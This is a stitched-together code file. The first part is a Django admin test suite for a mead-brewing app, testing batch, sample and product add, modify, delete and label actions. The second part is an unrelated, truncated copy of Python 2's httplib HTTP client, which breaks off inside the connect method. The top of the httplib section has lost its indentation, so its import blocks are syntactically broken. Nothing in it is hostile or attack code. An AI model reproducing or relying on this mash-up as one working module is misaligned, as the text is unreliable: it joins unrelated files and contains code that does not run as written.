        self.batch_with = batches.filter(num_samples__gt=0).order_by("is_active", "-created_at")[0]
        self.batch_without = batches.filter(num_samples=0).order_by("is_active", "-created_at")[0]

    def batch_create_product(samples, jars, success):
        # Decorator factory: set the jar count on the sample-ful or
        # sample-less batch, press its create_product button, and check
        # whether the product count changed as expected.
        def real_decorator(func):
            def _decorator(self, *args, **kwds):
                func(self, *args, **kwds)
                batch = self.batch_with if samples else self.batch_without
                batch.jars = jars
                batch.save()
                old_product_count = Product.objects.count()
                # JMT: must be a better way
                url = reverse("admin:meadery_batch_change", args=(batch.pk,))
                button_url = "{0}create_product/".format(url)
                response = self.client.get(button_url, follow=True)
                self.assertEqual(response.status_code, 302)
                redirect_target = button_url
                redirect_chain = [(redirect_target, 302), (redirect_target, 302)]
                self.assertEqual(response.redirect_chain, redirect_chain)
                new_product_count = Product.objects.count()
                if success:
                    self.assertNotEqual(new_product_count, old_product_count)
                else:
                    self.assertEqual(new_product_count, old_product_count)
            return _decorator
        return real_decorator

    # Tests inherited from BatchModifyTestCase are disabled here; this class
    # only exercises the create-product button.
    def test_modify(self):
        pass

    def test_create_recipe_from_batch(self):
        pass

    @skipIf(True, "Django reports redirect loop incorrectly.")
    @admin_login
    @batch_create_product(True, 0, False)
    def test_samples_no_jars(self):
        pass

    @skipIf(True, "Django reports redirect loop incorrectly.")
    @admin_login
    @batch_create_product(False, 0, False)
    def test_no_samples_no_jars(self):
        pass

    @skipIf(True, "Django reports redirect loop incorrectly.")
    @admin_login
    @batch_create_product(False, 24, False)
    def test_jars_no_samples(self):
        pass

    @skipIf(True, "Django reports redirect loop incorrectly.")
    @admin_login
    @batch_create_product(True, 24, True)
    def test_good_product_does_not_exist(self):
        pass

    @skipIf(True, "Django reports redirect loop incorrectly.")
    @admin_login
    @batch_create_product(True, 24, False)
    def test_good_product_exists(self):
        # The decorator creates the product once; this body presses the
        # button a second time, which must not create a duplicate.
        url = reverse("admin:meadery_batch_change", args=(self.batch_with.pk,))
        button_url = "{0}create_product/".format(url)
        response = self.client.get(button_url, follow=True)
        self.assertEqual(response.status_code, 302)
        redirect_target = button_url
        redirect_chain = [(redirect_target, 302), (redirect_target, 302)]
        self.assertEqual(response.redirect_chain, redirect_chain)
class BatchDeleteTestCase(BatchTestCase):
    """Exercise the admin delete-confirmation page for a batch."""

    def setUp(self):
        super(BatchDeleteTestCase, self).setUp()
        self.batch = Batch.objects.all()[0]
        self.pk = self.batch.pk
        self.url = reverse("admin:meadery_batch_delete", args=(self.pk,))

    @admin_login
    def test_delete(self):
        # Only the confirmation page is checked here; actually confirming
        # the delete was previously driven through Selenium (retired below).
        response = self.client.post(self.url, follow=True)
        self.assertContains(response, "Are you sure?")
        # body = self.selenium.find_element_by_tag_name('body')
        # self.assertIn('Are you sure?', body.text)
        # self.assertIn('All of the following related items will be deleted', body.text)
        # self.selenium.find_element_by_xpath('//input[@type="submit"]').click()
        # self.assertIn('The batch "%s" was deleted successfully.' % name, self.selenium.find_element_by_tag_name('body').text)
        # self.assertFalse(Batch.objects.filter(pk=pk).exists())
class BatchMiscTestCase(BatchTestCase):
    """Exercise the make_labels changelist action."""

    def setUp(self):
        super(BatchMiscTestCase, self).setUp()
        self.url = reverse("admin:meadery_batch_changelist")

    @admin_login
    def test_make_labels(self):
        # Monkey patch generate_labels to use the generic one.
        from meadery import meadery
        from meadery.labels import Label

        def generate_labels(batch):
            # One generic label per jar in the batch.
            return [Label(seq, batch) for seq in range(batch.jars)]
        meadery.generate_labels = generate_labels
        fields = {"action": "make_labels", "select_across": "0", "index": "0"}
        # What batches have jars? (hint: SIP 98 A and SIP 98 C)
        batches = Batch.objects.filter(jars__gt=0).order_by("pk")
        batchnames = ", ".join("{0} {1}".format(batch.brewname, batch.batchletter) for batch in batches)
        # filename = batchnames.lower().replace(', ', '-').replace(' ', '')
        fields["_selected_action"] = tuple([str(batch.pk) for batch in batches])
        response = self.client.post(self.url, fields, follow=True)
        # Two things should occur:
        # - a PDF file containing labels should be downloaded
        #   (check filename? match file against known good file?)
        # - a message referencing success should appear in the body
        #   (less important)
        # On Travis, the body message is in the response.
        # At home, the PDF is in the response.
        # Why? Who knows.
        import os
        if os.getenv("TRAVIS", None):
            self.assertContains(response, "Labels were made for {0}".format(batchnames))
        else:
            self.assertEqual(response.get("Content-Type"), "application/pdf")
class SampleTestCase(MeaderyTestCase):
    """Common fixture data and form-building helper for sample admin tests."""

    fields = {"date": "2012-05-31", "temp": "60", "sg": "1.168", "notes": "Tastes great for a test!"}

    def setUp(self):
        super(SampleTestCase, self).setUp()
        self.url = reverse("admin:meadery_sample_changelist")

    @staticmethod
    def build_sample(fields):
        """Return a POST dict for the sample admin form.

        Bug fix: the original did ``sample = SampleTestCase.fields``, which
        ignored the ``fields`` argument and aliased the shared class-level
        dict, so the added "batch" key (and any caller mutation, e.g. of
        "notes" in test_modify) leaked into ``SampleTestCase.fields`` for
        every other test.  Copy instead.
        """
        sample = dict(fields)
        sample["batch"] = Batch.objects.all()[0].pk
        return sample
class SampleAddTestCase(SampleTestCase):
    """Exercise the admin add form for samples."""

    def setUp(self):
        super(SampleAddTestCase, self).setUp()
        self.url = reverse("admin:meadery_sample_add")

    def sample_exists(before, after):
        # Decorator factory: assert whether a sample with the fixture notes
        # exists before and after the wrapped test runs.
        def real_decorator(func):
            def _decorator(self, *args, **kwds):
                self.assertEqual(before, Sample.objects.filter(notes=self.fields["notes"]).exists())
                func(self, *args, **kwds)
                self.assertEqual(after, Sample.objects.filter(notes=self.fields["notes"]).exists())
            return _decorator
        return real_decorator

    # JMT: consider adding bad tests
    @sample_exists(False, True)
    @admin_login
    def test_good_post(self):
        # POST a valid sample and check the admin success message.
        sample = SampleTestCase.build_sample(SampleTestCase.fields)
        response = self.client.post(self.url, sample, follow=True)
        respstr = "The sample .*{0}.* was added successfully.".format(Sample.objects.get(notes=self.fields["notes"]))
        self.assertRegex(response.content, bytes(respstr, "utf8"))
class SampleModifyTestCase(SampleTestCase):
    """Exercise the admin change form for an existing sample."""

    def setUp(self):
        super(SampleModifyTestCase, self).setUp()
        self.sample = Sample.objects.all()[0]
        self.pk = self.sample.pk
        self.url = reverse("admin:meadery_sample_change", args=(self.pk,))

    @admin_login
    def test_modify(self):
        """Changing the notes through the form persists the change."""
        before = self.sample.notes
        after = before + "!!!"
        self.assertNotEqual(before, after)
        # JMT: this is ... excessive
        form = SampleTestCase.build_sample(SampleTestCase.fields)
        form["notes"] = after
        response = self.client.post(self.url, form, follow=True)
        expected = "The sample .*{0}.* was changed successfully.".format(self.sample)
        self.assertRegex(response.content, bytes(expected, "utf8"))
        reloaded = Sample.objects.get(pk=self.pk)
        self.assertNotEqual(before, reloaded.notes)
        self.assertEqual(after, reloaded.notes)
class SampleDeleteTestCase(SampleTestCase):
    """Exercise the admin delete-confirmation page for a sample."""

    def setUp(self):
        super(SampleDeleteTestCase, self).setUp()
        self.sample = Sample.objects.all()[0]
        self.pk = self.sample.pk
        self.url = reverse("admin:meadery_sample_delete", args=(self.pk,))

    @admin_login
    def test_delete(self):
        # Only the confirmation page is checked here; actually confirming
        # the delete was previously driven through Selenium (retired below).
        response = self.client.post(self.url, follow=True)
        self.assertContains(response, "Are you sure?")
        # body = self.selenium.find_element_by_tag_name('body')
        # self.assertIn('Are you sure?', body.text)
        # self.assertIn('All of the following related items will be deleted', body.text)
        # self.selenium.find_element_by_xpath('//input[@type="submit"]').click()
        # self.assertIn('The sample "%s" was deleted successfully.' % name, self.selenium.find_element_by_tag_name('body').text)
        # self.assertFalse(Sample.objects.filter(pk=pk).exists())
class ProductTestCase(MeaderyTestCase):
    """Common fixture data and form-building helper for product admin tests."""

    fields = {
        "title": "Test Product",
        "description": "Test description!",
        "category": "241",
        "brewname": "SIP 99",
        "batchletter": "A",
        # 'is_active': 'on'
        "meta_keywords": "bogus",
        "meta_description": "bogus",
        "brewed_date": "2013-05-01",
        "brewed_sg": "1.126",
        "bottled_date": "2013-05-31",
        "bottled_sg": "0.996",
        "abv": "17.33",
    }

    def setUp(self):
        super(ProductTestCase, self).setUp()
        self.url = reverse("admin:meadery_product_changelist")

    @staticmethod
    def build_product(fields):
        """Return a copy of ``fields`` suitable for POSTing to the admin form.

        Fix: the original ignored its ``fields`` argument and hand-copied
        ProductTestCase.fields in a loop.  Every caller passes that same
        dict, so copying the argument is behavior-compatible, honors the
        parameter, and is simpler.
        """
        return dict(fields)
class ProductAddTestCase(ProductTestCase):
    """Exercise the admin add form for products."""

    def setUp(self):
        super(ProductAddTestCase, self).setUp()
        self.url = reverse("admin:meadery_product_add")
        self.product = ProductTestCase.build_product(ProductTestCase.fields)

    def product_exists(before, after):
        # Decorator factory: assert whether the test product exists in the
        # DB before and after the wrapped test runs.
        def real_decorator(func):
            def _decorator(self, *args, **kwds):
                self.assertEqual(before, Product.objects.filter(title=self.product["title"]).exists())
                func(self, *args, **kwds)
                self.assertEqual(after, Product.objects.filter(title=self.product["title"]).exists())
            return _decorator
        return real_decorator

    # JMT: write tests that check for bad posts
    @product_exists(False, True)
    @admin_login
    def test_good_post(self):
        # POST a valid product and check the admin success message.
        product = ProductTestCase.build_product(ProductTestCase.fields)
        response = self.client.post(self.url, product, follow=True)
        respstr = "The product .*{0} {1}.* was added successfully.".format(ProductTestCase.fields["brewname"], ProductTestCase.fields["batchletter"])
        self.assertRegex(response.content, bytes(respstr, "utf8"))
class ProductModifyTestCase(ProductTestCase):
    """Exercise the admin change form for an existing product."""

    def setUp(self):
        super(ProductModifyTestCase, self).setUp()
        self.product = Product.objects.all()[0]
        self.pk = self.product.pk
        self.url = reverse("admin:meadery_product_change", args=(self.pk,))

    @admin_login
    def test_modify(self):
        """Changing the description through the form persists the change."""
        before = self.product.description
        after = before + "!!!"
        self.assertNotEqual(before, after)
        # JMT: this is ... excessive
        form = ProductTestCase.build_product(ProductTestCase.fields)
        form["description"] = after
        response = self.client.post(self.url, form, follow=True)
        expected = "The product .*{0} {1}.* was changed successfully.".format(ProductTestCase.fields["brewname"], ProductTestCase.fields["batchletter"])
        self.assertRegex(response.content, bytes(expected, "utf8"))
        reloaded = Product.objects.get(pk=self.pk)
        self.assertNotEqual(before, reloaded.description)
        self.assertEqual(after, reloaded.description)
class ProductDeleteTestCase(ProductTestCase):
    """Exercise the admin delete-confirmation page for a product."""

    def setUp(self):
        super(ProductDeleteTestCase, self).setUp()
        self.product = Product.objects.all()[0]
        self.pk = self.product.pk
        self.url = reverse("admin:meadery_product_delete", args=(self.pk,))

    @admin_login
    def test_delete(self):
        # Only the confirmation page is checked here; actually confirming
        # the delete was previously driven through Selenium (retired below).
        response = self.client.post(self.url, follow=True)
        self.assertContains(response, "Are you sure?")
        # body = self.selenium.find_element_by_tag_name('body')
        # self.assertIn('Are you sure?', body.text)
        # self.assertIn('All of the following related items will be deleted', body.text)
        # self.selenium.find_element_by_xpath('//input[@type="submit"]').click()
        # self.assertIn('The product "%s" was deleted successfully.' % name, self.selenium.find_element_by_tag_name('body').text)
        # self.assertFalse(Product.objects.filter(pk=pk).exists())
        # JMT: should also check jar count to ensure jars are deleted too!
# --- end of meadery admin tests; an HTTP/1.1 client module follows below ---
"""HTTP/1.1 client library
<intro stuff goes here>
<other stuff, too>
HTTPConnection goes through a number of "states", which define when a client
may legally make another request or fetch the response for a particular
request. This diagram details these state transitions:
(null)
|
| HTTPConnection()
v
Idle
|
| putrequest()
v
Request-started
|
| ( putheader() )* endheaders()
v
Request-sent
|
| response = getresponse()
v
Unread-response [Response-headers-read]
|\____________________
| |
| response.read() | putrequest()
v v
Idle Req-started-unread-response
______/|
/ |
response.read() | | ( putheader() )* endheaders()
v v
Request-started Req-sent-unread-response
|
| response.read()
v
Request-sent
This diagram presents the following rules:
-- a second request may not be started until {response-headers-read}
-- a response [object] cannot be retrieved until {request-sent}
-- there is no differentiation between an unread response body and a
partially read response body
Note: this enforcement is applied by the HTTPConnection class. The
HTTPResponse class does not enforce this state machine, which
implies sophisticated clients may accelerate the request/response
pipeline. Caution should be taken, though: accelerating the states
beyond the above pattern may imply knowledge of the server's
connection-close behavior for certain requests. For example, it
is impossible to tell whether the server will close the connection
UNTIL the response headers have been read; this means that further
requests cannot be placed into the pipeline until it is known that
the server will NOT be closing the connection.
Logical State __state __response
------------- ------- ----------
Idle _CS_IDLE None
Request-started _CS_REQ_STARTED None
Request-sent _CS_REQ_SENT None
Unread-response _CS_IDLE <response_class>
Req-started-unread-response _CS_REQ_STARTED <response_class>
Req-sent-unread-response _CS_REQ_SENT <response_class>
"""
from array import array
import socket
from sys import py3kwarning
from urlparse import urlsplit
import warnings
with warnings.catch_warnings():
if py3kwarning:
warnings.filterwarnings("ignore", ".*mimetools has been removed",
DeprecationWarning)
import mimetools
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
# Public API of this module; `error' and `responses' are re-exported for
# backwards compatibility with older httplib consumers.
__all__ = ["HTTP", "HTTPResponse", "HTTPConnection",
           "HTTPException", "NotConnected", "UnknownProtocol",
           "UnknownTransferEncoding", "UnimplementedFileMode",
           "IncompleteRead", "InvalidURL", "ImproperConnectionState",
           "CannotSendRequest", "CannotSendHeader", "ResponseNotReady",
           "BadStatusLine", "error", "responses"]
HTTP_PORT = 80
HTTPS_PORT = 443
_UNKNOWN = 'UNKNOWN'
# connection states
_CS_IDLE = 'Idle'
_CS_REQ_STARTED = 'Request-started'
_CS_REQ_SENT = 'Request-sent'
# status codes
# informational
CONTINUE = 100
SWITCHING_PROTOCOLS = 101
PROCESSING = 102
# successful
OK = 200
CREATED = 201
ACCEPTED = 202
NON_AUTHORITATIVE_INFORMATION = 203
NO_CONTENT = 204
RESET_CONTENT = 205
PARTIAL_CONTENT = 206
MULTI_STATUS = 207
IM_USED = 226
# redirection
MULTIPLE_CHOICES = 300
MOVED_PERMANENTLY = 301
FOUND = 302
SEE_OTHER = 303
NOT_MODIFIED = 304
USE_PROXY = 305
TEMPORARY_REDIRECT = 307
# client error
BAD_REQUEST = 400
UNAUTHORIZED = 401
PAYMENT_REQUIRED = 402
FORBIDDEN = 403
NOT_FOUND = 404
METHOD_NOT_ALLOWED = 405
NOT_ACCEPTABLE = 406
PROXY_AUTHENTICATION_REQUIRED = 407
REQUEST_TIMEOUT = 408
CONFLICT = 409
GONE = 410
LENGTH_REQUIRED = 411
PRECONDITION_FAILED = 412
REQUEST_ENTITY_TOO_LARGE = 413
REQUEST_URI_TOO_LONG = 414
UNSUPPORTED_MEDIA_TYPE = 415
REQUESTED_RANGE_NOT_SATISFIABLE = 416
EXPECTATION_FAILED = 417
UNPROCESSABLE_ENTITY = 422
LOCKED = 423
FAILED_DEPENDENCY = 424
UPGRADE_REQUIRED = 426
# server error
INTERNAL_SERVER_ERROR = 500
NOT_IMPLEMENTED = 501
BAD_GATEWAY = 502
SERVICE_UNAVAILABLE = 503
GATEWAY_TIMEOUT = 504
HTTP_VERSION_NOT_SUPPORTED = 505
INSUFFICIENT_STORAGE = 507
NOT_EXTENDED = 510
# Mapping status codes to official W3C names
responses = {
100: 'Continue',
101: 'Switching Protocols',
200: 'OK',
201: 'Created',
202: 'Accepted',
203: 'Non-Authoritative Information',
204: 'No Content',
205: 'Reset Content',
206: 'Partial Content',
300: 'Multiple Choices',
301: 'Moved Permanently',
302: 'Found',
303: 'See Other',
304: 'Not Modified',
305: 'Use Proxy',
306: '(Unused)',
307: 'Temporary Redirect',
400: 'Bad Request',
401: 'Unauthorized',
402: 'Payment Required',
403: 'Forbidden',
404: 'Not Found',
405: 'Method Not Allowed',
406: 'Not Acceptable',
407: 'Proxy Authentication Required',
408: 'Request Timeout',
409: 'Conflict',
410: 'Gone',
411: 'Length Required',
412: 'Precondition Failed',
413: 'Request Entity Too Large',
414: 'Request-URI Too Long',
415: 'Unsupported Media Type',
416: 'Requested Range Not Satisfiable',
417: 'Expectation Failed',
500: 'Internal Server Error',
501: 'Not Implemented',
502: 'Bad Gateway',
503: 'Service Unavailable',
504: 'Gateway Timeout',
505: 'HTTP Version Not Supported',
}
# maximal amount of data to read at one time in _safe_read
MAXAMOUNT = 1048576
class HTTPMessage(mimetools.Message):
    """An RFC 822-style message holding the parsed HTTP response headers.

    Extends mimetools.Message so that repeated header fields are merged
    per RFC 2616 sec 4.2 instead of overwriting each other.
    """

    def addheader(self, key, value):
        """Add header for field key handling repeats."""
        prev = self.dict.get(key)
        if prev is None:
            self.dict[key] = value
        else:
            # RFC 2616 sec 4.2: repeated fields combine into one
            # comma-separated value, preserving arrival order.
            combined = ", ".join((prev, value))
            self.dict[key] = combined

    def addcontinue(self, key, more):
        """Add more field data from a continuation line."""
        prev = self.dict[key]
        self.dict[key] = prev + "\n " + more

    def readheaders(self):
        """Read header lines.

        Read header lines up to the entirely blank line that terminates them.
        The (normally blank) line that ends the headers is skipped, but not
        included in the returned list. If a non-header line ends the headers,
        (which is an error), an attempt is made to backspace over it; it is
        never included in the returned list.

        The variable self.status is set to the empty string if all went well,
        otherwise it is an error message. The variable self.headers is a
        completely uninterpreted list of lines contained in the header (so
        printing them will reproduce the header exactly as it appears in the
        file).

        If multiple header fields with the same name occur, they are combined
        according to the rules in RFC 2616 sec 4.2:

        Appending each subsequent field-value to the first, each separated
        by a comma. The order in which header fields with the same field-name
        are received is significant to the interpretation of the combined
        field value.
        """
        # XXX The implementation overrides the readheaders() method of
        # rfc822.Message. The base class design isn't amenable to
        # customized behavior here so the method here is a copy of the
        # base class code with a few small changes.
        self.dict = {}
        self.unixfrom = ''
        self.headers = hlist = []
        self.status = ''
        headerseen = ""
        firstline = 1
        # Prefer fp.unread() for pushback; fall back to tell()/seek() on
        # seekable files; otherwise a trailing junk line cannot be undone.
        startofline = unread = tell = None
        if hasattr(self.fp, 'unread'):
            unread = self.fp.unread
        elif self.seekable:
            tell = self.fp.tell
        while True:
            if tell:
                try:
                    startofline = tell()
                except IOError:
                    # tell() can fail on pipe-like objects; stop treating
                    # the stream as seekable from here on.
                    startofline = tell = None
                    self.seekable = 0
            line = self.fp.readline()
            if not line:
                self.status = 'EOF in headers'
                break
            # Skip unix From name time lines
            if firstline and line.startswith('From '):
                self.unixfrom = self.unixfrom + line
                continue
            firstline = 0
            if headerseen and line[0] in ' \t':
                # XXX Not sure if continuation lines are handled properly
                # for http and/or for repeating headers
                # It's a continuation line.
                hlist.append(line)
                self.addcontinue(headerseen, line.strip())
                continue
            elif self.iscomment(line):
                # It's a comment. Ignore it.
                continue
            elif self.islast(line):
                # Note! No pushback here! The delimiter line gets eaten.
                break
            headerseen = self.isheader(line)
            if headerseen:
                # It's a legal header line, save it.
                hlist.append(line)
                self.addheader(headerseen, line[len(headerseen)+1:].strip())
                continue
            else:
                # It's not a header line; throw it back and stop here.
                if not self.dict:
                    self.status = 'No headers'
                else:
                    self.status = 'Non-header line where header expected'
                # Try to undo the read.
                if unread:
                    unread(line)
                elif tell:
                    self.fp.seek(startofline)
                else:
                    self.status = self.status + '; bad seek'
                break
class HTTPResponse:
    """One HTTP response read from a socket.

    Parses the status line and headers in begin(), then serves the body
    through read(), honoring Content-Length and chunked transfer coding.
    """

    # strict: If true, raise BadStatusLine if the status line can't be
    # parsed as a valid HTTP/1.0 or 1.1 status line. By default it is
    # false because it prevents clients from talking to HTTP/0.9
    # servers. Note that a response with a sufficiently corrupted
    # status line will look like an HTTP/0.9 response.
    # See RFC 2616 sec 19.6 and RFC 1945 sec 6 for details.

    def __init__(self, sock, debuglevel=0, strict=0, method=None):
        # unbuffered makefile so reads track the socket exactly
        self.fp = sock.makefile('rb', 0)
        self.debuglevel = debuglevel
        self.strict = strict
        self._method = method  # request method; 'HEAD' suppresses the body

        self.msg = None  # HTTPMessage with the parsed headers, set by begin()

        # from the Status-Line of the response
        self.version = _UNKNOWN  # HTTP-Version
        self.status = _UNKNOWN   # Status-Code
        self.reason = _UNKNOWN   # Reason-Phrase

        self.chunked = _UNKNOWN      # is "chunked" being used?
        self.chunk_left = _UNKNOWN   # bytes left to read in current chunk
        self.length = _UNKNOWN       # number of bytes left in response
        self.will_close = _UNKNOWN   # conn will close at end of response

    def _read_status(self):
        """Read one status line; return (version, status, reason).

        For a non-strict parse failure the stream is rewrapped so the
        line is replayed as body data and an HTTP/0.9 response is assumed.
        """
        # Initialize with Simple-Response defaults
        line = self.fp.readline()
        if self.debuglevel > 0:
            print "reply:", repr(line)
        if not line:
            # Presumably, the server closed the connection before
            # sending a valid response.
            raise BadStatusLine(line)
        try:
            [version, status, reason] = line.split(None, 2)
        except ValueError:
            try:
                [version, status] = line.split(None, 1)
                reason = ""
            except ValueError:
                # empty version will cause next test to fail and status
                # will be treated as 0.9 response.
                version = ""
        if not version.startswith('HTTP/'):
            if self.strict:
                self.close()
                raise BadStatusLine(line)
            else:
                # assume it's a Simple-Response from an 0.9 server
                self.fp = LineAndFileWrapper(line, self.fp)
                return "HTTP/0.9", 200, ""

        # The status code is a three-digit number
        try:
            status = int(status)
            if status < 100 or status > 999:
                raise BadStatusLine(line)
        except ValueError:
            raise BadStatusLine(line)
        return version, status, reason

    def begin(self):
        """Parse the status line and headers; set length/chunked/will_close.

        Idempotent: a second call returns immediately once self.msg is set.
        """
        if self.msg is not None:
            # we've already started reading the response
            return

        # read until we get a non-100 response
        while True:
            version, status, reason = self._read_status()
            if status != CONTINUE:
                break
            # skip the header from the 100 response
            while True:
                skip = self.fp.readline().strip()
                if not skip:
                    break
                if self.debuglevel > 0:
                    print "header:", skip

        self.status = status
        self.reason = reason.strip()
        if version == 'HTTP/1.0':
            self.version = 10
        elif version.startswith('HTTP/1.'):
            self.version = 11   # use HTTP/1.1 code for HTTP/1.x where x>=1
        elif version == 'HTTP/0.9':
            self.version = 9
        else:
            raise UnknownProtocol(version)

        if self.version == 9:
            # HTTP/0.9 has no headers: the whole stream is the body and
            # the connection closes when it ends.
            self.length = None
            self.chunked = 0
            self.will_close = 1
            self.msg = HTTPMessage(StringIO())
            return

        self.msg = HTTPMessage(self.fp, 0)
        if self.debuglevel > 0:
            for hdr in self.msg.headers:
                print "header:", hdr,

        # don't let the msg keep an fp
        self.msg.fp = None

        # are we using the chunked-style of transfer encoding?
        tr_enc = self.msg.getheader('transfer-encoding')
        if tr_enc and tr_enc.lower() == "chunked":
            self.chunked = 1
            self.chunk_left = None
        else:
            self.chunked = 0

        # will the connection close at the end of the response?
        self.will_close = self._check_close()

        # do we have a Content-Length?
        # NOTE: RFC 2616, S4.4, #3 says we ignore this if tr_enc is "chunked"
        length = self.msg.getheader('content-length')
        if length and not self.chunked:
            try:
                self.length = int(length)
            except ValueError:
                self.length = None
            else:
                if self.length < 0:  # ignore nonsensical negative lengths
                    self.length = None
        else:
            self.length = None

        # does the body have a fixed length? (of zero)
        if (status == NO_CONTENT or status == NOT_MODIFIED or
            100 <= status < 200 or      # 1xx codes
            self._method == 'HEAD'):
            self.length = 0

        # if the connection remains open, and we aren't using chunked, and
        # a content-length was not provided, then assume that the connection
        # WILL close.
        if not self.will_close and \
           not self.chunked and \
           self.length is None:
            self.will_close = 1

    def _check_close(self):
        """Return True if the server will close the connection after this
        response, per the Connection/Keep-Alive/Proxy-Connection headers."""
        conn = self.msg.getheader('connection')
        if self.version == 11:
            # An HTTP/1.1 proxy is assumed to stay open unless
            # explicitly closed.
            # NOTE(review): this re-fetch of 'connection' is redundant --
            # `conn' was already assigned the same value above.
            conn = self.msg.getheader('connection')
            if conn and "close" in conn.lower():
                return True
            return False

        # Some HTTP/1.0 implementations have support for persistent
        # connections, using rules different than HTTP/1.1.

        # For older HTTP, Keep-Alive indicates persistent connection.
        if self.msg.getheader('keep-alive'):
            return False

        # At least Akamai returns a "Connection: Keep-Alive" header,
        # which was supposed to be sent by the client.
        if conn and "keep-alive" in conn.lower():
            return False

        # Proxy-Connection is a netscape hack.
        pconn = self.msg.getheader('proxy-connection')
        if pconn and "keep-alive" in pconn.lower():
            return False

        # otherwise, assume it will close
        return True

    def close(self):
        """Close our file object; the underlying socket may stay open."""
        if self.fp:
            self.fp.close()
            self.fp = None

    def isclosed(self):
        # NOTE: it is possible that we will not ever call self.close(). This
        #       case occurs when will_close is TRUE, length is None, and we
        #       read up to the last byte, but NOT past it.
        #
        # IMPLIES: if will_close is FALSE, then self.close() will ALWAYS be
        #          called, meaning self.isclosed() is meaningful.
        return self.fp is None

    # XXX It would be nice to have readline and __iter__ for this, too.

    def read(self, amt=None):
        """Read up to `amt' bytes of the body (all of it when amt is None).

        Returns '' once the body is exhausted or the response is closed.
        """
        if self.fp is None:
            return ''

        if self._method == 'HEAD':
            # a HEAD response never carries a body, whatever the headers say
            self.close()
            return ''

        if self.chunked:
            return self._read_chunked(amt)

        if amt is None:
            # unbounded read
            if self.length is None:
                s = self.fp.read()
            else:
                s = self._safe_read(self.length)
                self.length = 0
            self.close()        # we read everything
            return s

        if self.length is not None:
            if amt > self.length:
                # clip the read to the "end of response"
                amt = self.length

        # we do not use _safe_read() here because this may be a .will_close
        # connection, and the user is reading more bytes than will be provided
        # (for example, reading in 1k chunks)
        s = self.fp.read(amt)
        if self.length is not None:
            self.length -= len(s)
            if not self.length:
                self.close()
        return s

    def _read_chunked(self, amt):
        """Read a chunked-encoded body; `amt' of None means read it all."""
        assert self.chunked != _UNKNOWN
        chunk_left = self.chunk_left
        value = []
        while True:
            if chunk_left is None:
                # at a chunk boundary: parse the hex chunk-size line
                line = self.fp.readline()
                i = line.find(';')
                if i >= 0:
                    line = line[:i] # strip chunk-extensions
                try:
                    chunk_left = int(line, 16)
                except ValueError:
                    # close the connection as protocol synchronisation is
                    # probably lost
                    self.close()
                    raise IncompleteRead(''.join(value))
                if chunk_left == 0:
                    break
            if amt is None:
                value.append(self._safe_read(chunk_left))
            elif amt < chunk_left:
                value.append(self._safe_read(amt))
                self.chunk_left = chunk_left - amt
                return ''.join(value)
            elif amt == chunk_left:
                value.append(self._safe_read(amt))
                self._safe_read(2)  # toss the CRLF at the end of the chunk
                self.chunk_left = None
                return ''.join(value)
            else:
                value.append(self._safe_read(chunk_left))
                amt -= chunk_left

            # we read the whole chunk, get another
            self._safe_read(2)      # toss the CRLF at the end of the chunk
            chunk_left = None

        # read and discard trailer up to the CRLF terminator
        ### note: we shouldn't have any trailers!
        while True:
            line = self.fp.readline()
            if not line:
                # a vanishingly small number of sites EOF without
                # sending the trailer
                break
            if line == '\r\n':
                break

        # we read everything; close the "file"
        self.close()

        return ''.join(value)

    def _safe_read(self, amt):
        """Read the number of bytes requested, compensating for partial reads.

        Normally, we have a blocking socket, but a read() can be interrupted
        by a signal (resulting in a partial read).

        Note that we cannot distinguish between EOF and an interrupt when zero
        bytes have been read. IncompleteRead() will be raised in this
        situation.

        This function should be used when <amt> bytes "should" be present for
        reading. If the bytes are truly not available (due to EOF), then the
        IncompleteRead exception can be used to detect the problem.
        """
        s = []
        while amt > 0:
            # cap each read at MAXAMOUNT to bound per-call memory use
            chunk = self.fp.read(min(amt, MAXAMOUNT))
            if not chunk:
                raise IncompleteRead(''.join(s), amt)
            s.append(chunk)
            amt -= len(chunk)
        return ''.join(s)

    def getheader(self, name, default=None):
        """Return the value of header `name', or `default' when absent.

        Raises ResponseNotReady if begin() has not parsed the headers yet.
        """
        if self.msg is None:
            raise ResponseNotReady()
        return self.msg.getheader(name, default)

    def getheaders(self):
        """Return list of (header, value) tuples."""
        if self.msg is None:
            raise ResponseNotReady()
        return self.msg.items()
class HTTPConnection:
    """One client connection to an HTTP server.

    Enforces the request/response state machine described in the module
    docstring via self.__state and self.__response.
    """

    _http_vsn = 11
    _http_vsn_str = 'HTTP/1.1'

    response_class = HTTPResponse
    default_port = HTTP_PORT
    auto_open = 1      # reconnect automatically in send() after a close
    debuglevel = 0
    strict = 0

    def __init__(self, host, port=None, strict=None,
                 timeout=socket._GLOBAL_DEFAULT_TIMEOUT):
        self.timeout = timeout
        self.sock = None
        self._buffer = []            # request lines pending in _send_output()
        self.__response = None       # an unread response_class instance, if any
        self.__state = _CS_IDLE
        self._method = None          # method of the request in flight
        self._tunnel_host = None
        self._tunnel_port = None
        self._tunnel_headers = {}

        self._set_hostport(host, port)
        if strict is not None:
            self.strict = strict

    def _set_tunnel(self, host, port=None, headers=None):
        """ Sets up the host and the port for the HTTP CONNECT Tunnelling.

        The headers argument should be a mapping of extra HTTP headers
        to send with the CONNECT request.
        """
        self._tunnel_host = host
        self._tunnel_port = port
        if headers:
            self._tunnel_headers = headers
        else:
            self._tunnel_headers.clear()

    def _set_hostport(self, host, port):
        """Split an explicit port out of `host' (handling [ipv6] brackets)
        and store the pair on self.host/self.port."""
        if port is None:
            i = host.rfind(':')
            j = host.rfind(']')         # ipv6 addresses have [...]
            if i > j:
                try:
                    port = int(host[i+1:])
                except ValueError:
                    raise InvalidURL("nonnumeric port: '%s'" % host[i+1:])
                host = host[:i]
            else:
                port = self.default_port
            if host and host[0] == '[' and host[-1] == ']':
                host = host[1:-1]
        self.host = host
        self.port = port

    def set_debuglevel(self, level):
        self.debuglevel = level

    def _tunnel(self):
        """Issue a CONNECT to the proxy and consume its response headers."""
        self._set_hostport(self._tunnel_host, self._tunnel_port)
        self.send("CONNECT %s:%d HTTP/1.0\r\n" % (self.host, self.port))
        for header, value in self._tunnel_headers.iteritems():
            self.send("%s: %s\r\n" % (header, value))
        self.send("\r\n")
        response = self.response_class(self.sock, strict = self.strict,
                                       method = self._method)
        (version, code, message) = response._read_status()

        if code != 200:
            self.close()
            raise socket.error("Tunnel connection failed: %d %s" % (code,
                                                                    message.strip()))
        # discard the proxy's response headers up to the blank line
        while True:
            line = response.fp.readline()
            if line == '\r\n': break

    def connect(self):
        """Connect to the host and port specified in __init__."""
        self.sock = socket.create_connection((self.host,self.port),
                                             self.timeout)

        if self._tunnel_host:
